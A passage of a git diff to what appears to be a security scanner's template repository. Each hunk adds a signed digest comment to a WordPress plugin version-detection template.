4a0a00473045022100c74ccc5358f149659a1816595c1a79b07b4fcbd585fd70c9840dc7cbb34ad9ae02206f812796c9733931133948b54386a649108fe4e58429775356f2499ca5d85712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca9..d8ed3f78133 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fb97129128d726c94715aef7e5efd013433124315869ad1cb5cdacda8bfca5f022075462e0f14e87fa195e863c1ac0f04a63a8aa53110b38f8b004bb91a0b6699d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82db..ead4854fde0 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f43d2e1c81f05974354bec07fbd1d61d933f905c9d7051c59d4a8c452441b98b022100c06f381b88f9d87d8f3b38fc8a3f36a4b7912bd58f13a848404e8521600982b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201fc..2805bfe423c 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220690aa22de841a4565f23ad67b72195ca0de1237e81ec519379a8069460729972022100a8291c18d0c74465e39fe9cddf26619526840860906f233c45dea68344fd807b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d07..1b3bc4df127 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e00f49de3fe478b66164964365341fb2b2256a904a4ecb21ad513b2750b0756022016ec06b4bee3cc6aafe99b2db3a13b64646892425aff62b95f6bfb37d4040867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78a..bb881e8a287 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075b73febe3ff06b6dcfed643eeda968d823133773467fefc27fcbbb88259b16302206c39309afe06b47257035b29cd125b685b04c6f174c31f4adfdcaf4c3ecb6378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8eaf..232867c6b96 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e439512a6c35734283e67741a6bc01e441ce457874b7b98a37414c0a360cce702206c6cf039f22bebc62105b30721442279f4b522cb139e4b8f2d700723349effcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e1..ce12a988162 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dec77d93d33b0a592c62a934e3936dffea8f0d1e89bbfb2f4d1253779d1aa50e0221009b5518a10a1daa440474c56b7c462f521b6626d871e927390d2612644bdff27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389dc..c90a854e693 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035f9d095c41ab0d3f391683467a9c53b0de3497ad1f103125ab9fb828a414ed402207eb9f16a123ee750d831cc552aa11412e8377dff1423f35e9d3d4d1a392b2ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492c..a7a9fdb63e4 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205be3383cb9b084dabb44062477a21b97b64d50cc76947372c0ce9d60b3887da7022070838964786011f26a7ed2b2ea742a5e29c7f143043a9c2e48bfaa09be41de5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d1..c877300883c 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a5ff37e5fac7f4153b6131ccaf8f898ac9386a1f62745b9c26c1ca22e28b8c30220302d51df30e2751e88c0c735cd6ccb051ee929335b6d7c24f213bc73844610f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee79807..088efba661b 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f8ec2ca8016d6dea0634ee3fa96ff19653ef8f3d1019d7c882552b0de94275c02200df039c05ef42d3513b1b242034a248500e383f05791fee65a74df7b0cf10883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767b..46a0e7d242c 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100de54cca0eccf4bb140e00add1fe63235a58943aaf474dc8b8fe1005c29add71c02210093e5d4d4c308fb1e43dfe8fe3bd1e7fdddf40382821169f5da970a72ac5d491c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073ca..4f623eaf831 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ac5b8c4179b99fdd4271b843f399a806a35f3e77d5b04c7b46edec7a0f4053002200f04088b4685817032203dca46b687f09695cb20bfa37420525ae9eb1368be55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55f..d5f2718f375 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4c34d6656e1c2ccd81d870fe427361464c31c16d393bbbf66c85b35c5f3117a022100a64998adc291eaecb67f5646a46844c83e2aa06fdd43acff23b2331af721a864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692e..de2fe498322 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220753036e03aaa3dbe280f639079177fbe1b66e127da51ff615527213bdd4a1205022033d383b372734518f3defaff78b602917ed2f3af822a4f7350c924d3d1713039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f3..cb5ad6b3a17 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f8f82bf5febba8e2db86a845827134673b9ba9d8e795c21b9ef8644612d9900022044c4a42d70041e93c64bdbd68bde4e830400287f92c91f31b709f83ff02e4686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316c..f22a7e6a3e0 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220300b2ba420748fb85320956e1f97669e6712a8ba8f8a84a0599128a251cb9876022100c14cc3f1d4e2b7df9f1e5bf9c175a7f743082fa21fc59b0dcba059c0a247d04f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff207791572..b84ff9ef201 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205cfd3b23045537e657f15d845eb6545268da64e22c76c8093351ff34b8389a6b022100d977fa68d216ca750a10c57f511b392accff36b62b67e12211558b621212da78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017a..fb1672e1f67 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022006cdf48c3b9568b507ec3274c276e12cc65badbcd98e94ba8ed232342dbb2a15022100cfadbdc5cb4b43fc973319092b425ece6b0157a075c0f2127848e4b4db6414b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d5..241b665891e 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2875570753c60f6a0f2b1b733cc3e8c4b7786454b6041c1efbf15994f97180b022100c74ff866e1f54782f693721384ed8e27a0016f307f3e69af432a373b518c6680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf56..a23088bd816 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cfbca309ca3ead79620290dc4076619dadbdcc1edb0b9f928086faaad84f60f502205fa2fbb948fc13d9db8b6c6d63cb4053b3d291323dd5bedf6d08b390d18f9b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94b..1f05aaa4efc 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203127969a8b5499f56bb733bdd0920c3d79d8339b2ae3c4589a025f35ce3ad5af02202c044d0c80268f22398acdfd92532b5c324c080ad1a687a926305e3c2300b9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709d..84c3b5da11c 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220447d0556ac39135757b1446a0e5563ae89cf57d57950e1b92abbf7e76e8fdd15022038f47bd4d79b5e32704325cb0acc022d4316ef484dbe1e423ce3000a95f2e264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c276825..9a934675499 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009edd0156c5cc8b5b678699334e1957281658dd849db3b786dcbea34e851d87ef0221008fe8e53ce2b0240810d04fbadc644d04d55e3d71d73fb0a8e8f306d3bce20c67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b1..3e97323b198 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae41d8479a77bc646b7b723b038589f1f10d7166ec4d14a867b1b106d01ef03602210099fc656ee0d7909ad4893e1bb4757d7e13d0c664a970013ac1d8ca39bf760650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a9..43d263fc8df 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e18685816c6012c4f10e38ebacda9bb15922135acd00d6bcd07025565fdcc5e6022100d5f690d44aa4aae3128117be4e6f3e23ac8789e44b98ee5781c628018e6e7d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb856..d757b72dc01 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220780d62ddfd7598d22221567ab7b795b86ed19405bccaa529b2f8c4ab528c9ed80221009862677dedffe28ccf8c7bc6eec23a4d07b0efbc04aadb76850d70cd16d4e459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c63..141e501dbc0 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa0ed357a683b5445b0d5b9d9222ff3dcd06aa2a7fd976ccd8b6c1bbba596aab022067367a8e52812e8f8ae9d95686507344c4f6cdbad2b6c04e2b29a1d72468dbdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a342590..c02ce33b98c 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207fd4bc920c77930f54ebfa9c3e797239ce279501c134d8cdcc56b85c1d880ec60220701afa4523cfe387efe54bd67215e97d2d886566820f4fd8ef55cfe3f49636d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4be..bf6a35e3493 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e362f0e91fcbc3a63c628b4f0d3bd24c9aa4866f41e40f0628738bd316a96d702205b0c8277424c3efeb8288cd8da0116756970d5d554ee831c039a5c59e3b774e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed14..055daeb94bc 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203516c1d8aa0db0f02b6abe7c96a110dc1214b33581aeb2ace32d65c5bbc1b6fe0221008f44361b4c10773311522681f62d208e24b2c880f2ed47b44e6ab1799f3cd74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274b..a7c6b3dd8f7 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207082f801483226470e10b54e66c05254fad0251dee96484f2cdd403e53759500022100b1ca3dc47d89cc547f925f64696d21f472e49f28d67b62541763f6b408632a11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec66..e51ebf47065 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbd3ba1b0ab93948325bfe1665e6a7f1300d67c9078eb6153227cf827e9cf2ef02200e9686a7327a4af0948a9abdb888a855c82babfaa9ca76e71993cad86c9f7a73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6c..23751d61125 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abfc25744401a03dcb216b50d84fa546e88207237db0a3c2cbae9ef45a198197022100ef5ffc2a613627626d535cae1edcce251040e938e175f1b1710de0c5a3d952c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35a..ef3f7823a35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d055b7bfd5584008f0bab3a3b863430d109fcf855fd0660bd99ed087c3bfc29302206cb192af79e9fc49fb40057128f910005d122473f170a2ab5a927fe683b4f906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4fa..4d0202eb1b0 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b488e09c22e61758d7740fb01e6e6b27646b2c52942082bf5ccd64fb58932c402207adafbbfab96f3b28a66d76092a1f9c74bf5550e6b06388e63347166ee77b832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf72..fd7807f0c47 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb0b374d28497dbaacc5d1e60398d2f1265f7a36d8cbf579321acd22879b95640220741184e075f30a4aeb13e4b0bf7b7aa9932012aac1a18c4b30bf2b6fa795ad01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f7..e9166fcb94b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b62daf113fecc88ec6b76fe0f2343d3980aff4ae1770d7cd9040bfa5ce6383d02203c46de2caf63278a99f422d9a312308ac349a9419656067024666a4f062e96f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf10..e188bb085b4 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220423796077f7866de15930bc25e35d1834c1675ac72da75894d677cbb7b5fca200220489884313d24e308bc766789d48a99f37ebe274d620437ce2802b5e58498a9e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7cf..84cfdb92ddc 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8839424132ce73202c4affcb8b99417c1f94e2db2b2bcd3b3a286fbf2bbab8d022100cbf5de1e09c26cb7646be16dabcb53de5c948d1276b428a64dfe27cad948638a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb44838..e321fb10b43 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b308a2277ad053a9035a75ca030560f0ef03a5b42dede95175296a62f299e13022100d9bbac803d35edaf741236a6bb90a8963c47abb2b3c7c6b243e7ae8b1acb6512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdfc..35e40bcea93 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022070fc4a3fe1c0bcd75884572d206af0cd43ba1fd6f35e0501990cc72a6ce329b202201e7c141521a021dcddf900833fd27364ecb2a778268f5d9067aa66a2c82705ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b4..790ff3accd6 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a7eac103e54a33bf3619af408d7a10ee506061eb51adc4f03e1e4fceb573b39022100d4b8137885e62ef4d249f61aec975509fba4ab77889a6efcbba11a4326dca921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbbab..29db49d18de 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfb836965e834b46893949a85458f323719d837d4139ac2858898036ead0bd5502207777240409d5660a9d2b26c6e398e8f353db5031fef7d5c69db0c9a98c580b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb9..a620aa5f184 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022043425dd78623cb573da34e092416d9c4283e9b619d1ea3cead77ac5969a9e3fb02202befb2757621c303d994322afbfc7577c92a09247e1c371c54bf69c6478602d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d1..13e3400a319 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a0fc439af9d1a762bcb24b875f2f0cc6e22ff0b4bca456eb5690711d85d8ab80022100e0202d1a2ae41d6d09d4561bb73eba3c6b134b851a51addd169384db08a4c698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d1..84eea515e65 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 